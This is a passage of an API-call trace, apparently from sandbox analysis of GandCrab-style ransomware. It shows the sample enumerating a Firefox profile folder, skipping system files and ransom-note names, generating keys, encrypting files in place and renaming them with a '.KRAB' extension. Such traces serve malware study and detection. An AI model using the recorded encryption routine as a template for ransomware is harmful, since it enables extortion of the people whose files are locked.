FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0081.140] lstrcmpW (lpString1="LICENSE.txt", lpString2=".") returned 1 [0081.140] lstrcmpW (lpString1="LICENSE.txt", lpString2="..") returned 1 [0081.140] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="LICENSE.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" [0081.140] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.140] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt.KRAB") returned 122 [0081.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned 117 [0081.140] lstrlenW (lpString=".txt") returned 4 [0081.140] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.140] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0081.141] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.141] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned 117 [0081.141] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned 117 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="desktop.ini") returned 1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="autorun.inf") returned 1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="ntuser.dat") returned -1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="iconcache.db") returned 1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="bootsect.bak") returned 1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="boot.ini") returned 1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="ntuser.dat.log") returned -1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="thumbs.db") returned -1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="KRAB-DECRYPT.txt") returned 1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="CRAB-DECRYPT.txt") returned 1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="ntldr") returned -1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="NTDETECT.COM") returned -1 [0081.141] lstrcmpiW (lpString1="LICENSE.txt", lpString2="Bootfont.bin") returned 1 [0081.142] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.142] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0x1011ab8) returned 1 [0081.146] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0081.146] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.147] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.147] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338e04c | out: pbBuffer=0x338e04c) returned 1 [0081.147] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.147] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.147] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0x1011ab8) returned 1 [0081.149] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0081.149] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.149] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.149] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338e06c | out: pbBuffer=0x338e06c) returned 1 [0081.149] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.149] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.150] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0x1011ab8) returned 1 [0081.151] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0x10231f8) returned 1 [0081.151] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0081.151] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0081.152] GetLastError () returned 0x0 [0081.152] CryptDestroyKey (hKey=0x10231f8) returned 1 [0081.152] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.152] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0x1011ab8) returned 1 [0081.155] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0x1023038) returned 1 [0081.155] CryptGetKeyParam (in: hKey=0x1023038, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0081.155] CryptEncrypt (in: hKey=0x1023038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0081.156] GetLastError () returned 0x0 [0081.156] CryptDestroyKey (hKey=0x1023038) returned 1 [0081.156] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.156] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\license.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0081.156] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0081.162] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0081.163] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e07c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e07c*=0x1df, lpOverlapped=0x0) returned 1 [0081.193] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffffe21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.193] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1df, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e078*=0x1df, lpOverlapped=0x0) returned 1 [0081.193] WriteFile (in: hFile=0x484, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e078*=0x208, lpOverlapped=0x0) returned 1 [0081.214] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.218] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.219] CloseHandle (hObject=0x484) returned 1 [0081.225] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.226] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\license.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\license.txt.krab")) returned 1 [0081.227] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.228] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0081.228] lstrcmpW (lpString1="manifest.json", lpString2=".") returned 1 [0081.228] lstrcmpW (lpString1="manifest.json", lpString2="..") returned 1 [0081.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="manifest.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" [0081.228] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.228] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.KRAB") returned 124 [0081.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned 119 [0081.228] lstrlenW (lpString=".json") returned 5 [0081.228] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.228] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".json ") returned 6 [0081.229] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned 119 [0081.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned 119 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="desktop.ini") returned 1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="autorun.inf") returned 1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="ntuser.dat") returned -1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="iconcache.db") returned 1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="bootsect.bak") returned 1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="boot.ini") returned 1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="ntuser.dat.log") returned -1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="thumbs.db") returned -1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="KRAB-DECRYPT.html") returned 1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="ntldr") returned -1 [0081.229] lstrcmpiW (lpString1="manifest.json", lpString2="NTDETECT.COM") returned -1 [0081.230] lstrcmpiW (lpString1="manifest.json", lpString2="Bootfont.bin") returned 1 [0081.230] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.230] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0x1011ab8) returned 1 [0081.231] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0081.232] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.232] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.232] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338e04c | out: pbBuffer=0x338e04c) returned 1 [0081.232] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.232] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.232] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0x1011ab8) returned 1 [0081.234] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0081.234] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.235] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.235] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338e06c | out: pbBuffer=0x338e06c) returned 1 [0081.235] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.235] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.235] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0x1011ab8) returned 1 [0081.249] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0x10235b8) returned 1 [0081.251] CryptGetKeyParam (in: hKey=0x10235b8, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0081.251] CryptEncrypt (in: hKey=0x10235b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0081.251] GetLastError () returned 0x0 [0081.251] CryptDestroyKey (hKey=0x10235b8) returned 1 [0081.251] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.251] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0x1011ab8) returned 1 [0081.253] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0x10235f8) returned 1 [0081.253] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0081.253] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0081.253] GetLastError () returned 0x0 [0081.253] CryptDestroyKey (hKey=0x10235f8) returned 1 [0081.254] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.254] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0081.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0081.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0081.255] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e07c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e07c*=0x15d, lpOverlapped=0x0) returned 1 [0081.284] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.284] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e078*=0x15d, lpOverlapped=0x0) returned 1 [0081.284] WriteFile (in: hFile=0x484, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e078*=0x208, lpOverlapped=0x0) returned 1 [0081.286] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.301] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.301] CloseHandle (hObject=0x484) returned 1 [0081.302] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.302] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.krab")) returned 1 [0081.303] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.303] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0081.303] lstrcmpW (lpString1="widevinecdm.dll", lpString2=".") returned 1 [0081.303] lstrcmpW (lpString1="widevinecdm.dll", lpString2="..") returned 1 [0081.303] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="widevinecdm.dll" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll" [0081.303] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.304] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.KRAB") returned 126 [0081.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll") returned 121 [0081.304] lstrlenW (lpString=".dll") returned 4 [0081.304] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.304] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".dll ") returned 5 [0081.304] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.305] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.305] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0081.305] lstrcmpW (lpString1="widevinecdm.dll.lib", lpString2=".") returned 1 [0081.305] lstrcmpW (lpString1="widevinecdm.dll.lib", lpString2="..") returned 1 [0081.305] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="widevinecdm.dll.lib" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" [0081.305] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.306] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.KRAB") returned 130 [0081.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned 125 [0081.306] lstrlenW (lpString=".lib") returned 4 [0081.306] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.306] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lib ") returned 5 [0081.306] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned 125 [0081.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned 125 [0081.306] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="desktop.ini") returned 1 [0081.306] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="autorun.inf") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="ntuser.dat") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="iconcache.db") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="bootsect.bak") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="boot.ini") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="ntuser.dat.log") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="thumbs.db") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="KRAB-DECRYPT.html") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="KRAB-DECRYPT.txt") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="CRAB-DECRYPT.txt") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="ntldr") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="NTDETECT.COM") returned 1 [0081.307] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="Bootfont.bin") returned 1 [0081.307] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.307] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0x1011ab8) returned 1 [0081.309] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0081.309] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.310] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.310] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338e04c | out: pbBuffer=0x338e04c) returned 1 [0081.310] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.310] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.310] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0x1011ab8) returned 1 [0081.326] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0081.327] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.327] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.327] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338e06c | out: pbBuffer=0x338e06c) returned 1 [0081.327] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.327] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.327] 